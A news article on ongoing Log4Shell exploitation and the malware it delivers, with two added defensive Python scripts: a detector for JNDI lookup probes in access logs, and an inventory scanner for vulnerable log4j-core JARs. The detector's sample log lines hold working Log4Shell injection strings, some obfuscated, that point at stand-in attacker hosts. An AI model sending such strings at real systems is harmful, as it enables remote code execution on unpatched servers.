The critical vulnerability Log4Shell (CVE-2021-44228) in the Apache Log4j Java logging library, which lets an attacker run arbitrary code simply by getting a crafted lookup string logged, is being used to deploy a range of malware payloads, from turning devices into DDoS bots to installing cryptominers.
According to researchers at Barracuda, the past couple of months have seen peaks and dips in Log4Shell attacks, but the overall number of exploitation attempts has stayed relatively constant. Most attempts came from IP addresses in the USA, followed by Japan, Central Europe and Russia. The researchers note that many systems still run old, unpatched versions of the logging library and remain exposed.
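The article counts exploitation attempts without showing what one looks like on the wire, so here is a detector for them, added as an example for this page rather than code from Barracuda or the Log4j project. Log4Shell fires when Log4j evaluates a lookup string such as ${jndi:ldap://attacker/x} that arrived in attacker-controlled input (a User-Agent, a URL, a Referer). Probes routinely hide the marker behind URL-encoding and nested lookups like ${${lower:j}ndi:...} or ${${::-j}ndi:...}, so a plain grep for "jndi:" misses a large share of them; the script below collapses those forms the way Log4j's own string substitution would before matching. The access-log lines, IP addresses and function names are constructed for the example.

```python
"""Spot Log4Shell probes in combined-format (Apache/Nginx) access logs.

Added example for this article, not code from Barracuda or the Log4j project.
Log4Shell fires when Log4j evaluates a lookup like ${jndi:ldap://host/x} that
arrived in logged input.  Probes hide the marker with URL-encoding and nested
lookups (${${lower:j}ndi:...}, ${${::-j}ndi:...}), so the detector collapses
those the way Log4j's substitution would before matching.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body containing no '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI_MARKER = re.compile(r"\$\{jndi:", re.IGNORECASE)
# Combined log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<request>[^"]*)" \d+ \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
MAX_ROUNDS = 20  # bound the unrolling so a hostile line cannot make us spin


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup as pre-2.15 Log4j would.

    ${name:-default} -> default   (covers ${::-j}, ${env:NaN:-j}, ${sys:x:-j})
    ${lower:text}    -> text.lower()
    ${upper:text}    -> text.upper()
    anything else    -> ''        (real Log4j leaves unknown lookups in place;
                                  dropping them errs toward flagging the line,
                                  which is the right bias for a detector)
    """
    if ":-" in body:
        return body.partition(":-")[2]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return ""


def normalize_lookups(text: str) -> str:
    """URL-decode (bounded, to catch double-encoding) and collapse nested
    lookups until a ${jndi: marker surfaces or nothing is left to resolve."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(MAX_ROUNDS):
        if JNDI_MARKER.search(text):
            break
        text, replaced = INNER_LOOKUP.subn(lambda m: _resolve(m.group(1)), text)
        if replaced == 0:
            break
    return text


def is_log4shell_probe(text: str) -> bool:
    return JNDI_MARKER.search(normalize_lookups(text)) is not None


def scan_access_log(lines):
    """Return (client_ip, field, normalized_value) for every request field
    that carries a probe, in log order."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not combined format; a real scanner would report this
        for field in ("request", "referer", "agent"):
            value = m.group(field)
            if is_log4shell_probe(value):
                hits.append((m.group("ip"), field, normalize_lookups(value)))
    return hits


# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Mar/2022:10:21:33 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.23 - - [15/Mar/2022:10:21:40 +0000] "GET / HTTP/1.1" 200 5123 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '198.51.100.42 - - [15/Mar/2022:10:22:01 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.42%2Fx%7D HTTP/1.1" 404 210 "-" "curl/7.79.1"',
    '192.0.2.9 - - [15/Mar/2022:10:22:15 +0000] "POST /api/login HTTP/1.1" 401 45 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://192.0.2.9/o}" "python-requests/2.27"',
    '203.0.113.8 - - [15/Mar/2022:10:23:00 +0000] "GET /status HTTP/1.1" 200 12 "-" "monitor ${date:yyyy} check"',
]

if __name__ == "__main__":
    for ip, field, payload in scan_access_log(SAMPLE_LOG):
        print(f"{ip:15} {field:8} {payload}")
```

Running it on the sample lines reports three probes (one in a User-Agent, one percent-encoded in the query string, one spelled entirely out of ${::-x} default-value lookups in the Referer) and leaves the benign line containing a harmless ${date:yyyy} lookup alone. Feed it a real access log and the IP column gives the per-source counts the report above describes.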
Among the payloads delivered in these attacks, the lion's share are Mirai variants. Mirai targets internet-exposed IP cameras, routers and other IoT devices and enrolls them in a botnet, which the operator can then direct to launch DDoS attacks against a chosen target, exhausting its resources and disrupting its online services.
The operators either rent out the botnet's capacity to others or launch DDoS attacks themselves to extort money from the targeted companies.
Other payloads seen in recent Log4Shell exploitation include BillGates (DDoS), Kinsing (cryptominer), XMRig (cryptominer) and Muhstik (DDoS).
The simplest protection against these attacks is to upgrade Log4j to version 2.17.1 or later. That means every copy of log4j-core an organisation runs, including the ones bundled inside application archives and third-party products, which a dependency manager will not update for you.
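Upgrading only helps once every copy has been found, so here is an inventory script, added as an example for this article and not tooling from the Log4j project. It walks a directory tree, opens every JAR, WAR and EAR, descends into archives nested inside them (Spring Boot fat jars carry log4j-core under BOOT-INF/lib/), reads the version from log4j-core's Maven pom.properties and checks for JndiLookup.class, the class whose removal was the stopgap mitigation for older 2.x releases. Anything below the article's 2.17.1 threshold with that class present is flagged. The archives it scans here are constructed fixtures with placeholder class bytes, not real Log4j binaries, and the function and status names are the example's own.

```python
"""Find log4j-core copies on disk, nested JARs included, and flag those below 2.17.1.

Added example for this article, not Log4j project tooling.  Version comes from
log4j-core's Maven pom.properties inside the JAR; JndiLookup.class is the class
CVE-2021-44228 abuses (and the one removed as a stopgap on old 2.x releases).
"""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
SAFE_VERSION = (2, 17, 1)           # the article's recommended minimum
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    location: str          # filesystem path; "!" separates nested archive members
    version: tuple         # parsed version, () when no pom.properties was found
    has_jndi_lookup: bool

    @property
    def vulnerable(self) -> bool:
        # Without JndiLookup.class the lookup cannot be reached (Log4j 1.x has a
        # different package layout and no such class).  With it present, anything
        # below 2.17.1 or of unknown version is flagged for action.
        if not self.has_jndi_lookup:
            return False
        return not self.version or self.version < SAFE_VERSION


def parse_version(pom_properties: str) -> tuple:
    """'version=2.17.1-rc1' -> (2, 17, 1); trailing qualifiers are ignored."""
    for line in pom_properties.splitlines():
        if line.startswith("version="):
            parts = []
            for piece in line.split("=", 1)[1].strip().split("."):
                m = re.match(r"\d+", piece)
                if not m:
                    break
                parts.append(int(m.group()))
            return tuple(parts)
    return ()


def scan_archive(data: bytes, location: str) -> list:
    """Inspect one archive held in memory and recurse into archives it contains."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            version = ()
            if POM_PROPS in names:
                version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
            findings.append(Finding(location, version, JNDI_CLASS in names))
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(scan_archive(zf.read(name), f"{location}!{name}"))
    return findings


def scan_tree(root: str) -> list:
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if filename.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, filename)
                with open(path, "rb") as fh:
                    findings.extend(scan_archive(fh.read(), path))
    return sorted(findings, key=lambda f: f.location)


def report(root: str) -> list:
    """[(location relative to root, version, status)] for every log4j-core found."""
    rows = []
    for f in scan_tree(root):
        version = ".".join(map(str, f.version)) or "unknown"
        if f.vulnerable:
            status = "VULNERABLE"
        elif not f.has_jndi_lookup:
            status = "mitigated (JndiLookup removed)"
        else:
            status = "patched"
        rows.append((os.path.relpath(f.location, root), version, status))
    return rows


def build_fixture(root: str) -> None:
    """Write constructed sample archives (placeholder class bytes, not real Log4j)."""
    def write_jar(dest, version, with_jndi=True):
        with zipfile.ZipFile(dest, "w") as zf:
            zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                                   f"artifactId=log4j-core\nversion={version}\n")
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    write_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
    write_jar(os.path.join(lib, "log4j-core-2.17.1.jar"), "2.17.1")
    write_jar(os.path.join(lib, "log4j-core-2.12.1-stripped.jar"), "2.12.1", with_jndi=False)
    nested = io.BytesIO()            # a fat application jar bundling log4j-core
    write_jar(nested, "2.15.0")
    with zipfile.ZipFile(os.path.join(root, "app.jar"), "w") as zf:
        zf.writestr("BOOT-INF/lib/log4j-core-2.15.0.jar", nested.getvalue())


def demo() -> list:
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return report(tmp)


if __name__ == "__main__":
    for location, version, status in demo():
        print(f"{status:32} {version:8} {location}")
```

Point scan_tree at a server's application directories instead of the fixture and the report lists each log4j-core with its version and whether it is patched, mitigated by class removal, or still exposed. The nested-archive case is the one most often missed: a vendor's fat jar that was never rebuilt will carry its own vulnerable copy no matter what the project's own dependency file says.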